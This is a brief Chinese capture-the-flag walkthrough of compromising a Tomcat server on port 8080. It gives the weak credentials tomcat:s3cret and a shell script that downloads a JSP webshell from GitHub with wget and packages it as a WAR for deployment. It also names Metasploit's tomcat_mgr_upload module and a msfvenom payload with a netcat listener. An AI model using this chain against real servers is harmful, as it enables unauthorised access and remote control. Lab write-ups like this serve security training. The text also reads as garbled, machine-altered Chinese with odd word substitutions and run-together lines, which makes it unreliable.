easy box.
首先 nmap 开路:
找到 8080 端口:
Tomcat 字典:
https://raw.githubusercontent…
找到弱口令 tomcat:s3cret
部署 war 包:
办法 1:
官网 walkthrough 上的:
#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 部署 wshell:
门路比拟深
拿到 flag
办法 2:
msf 应用 multi/http/tomcat_mgr_upload
办法 3:
msfvenom 生成 war 包
上传 war 包后 nc: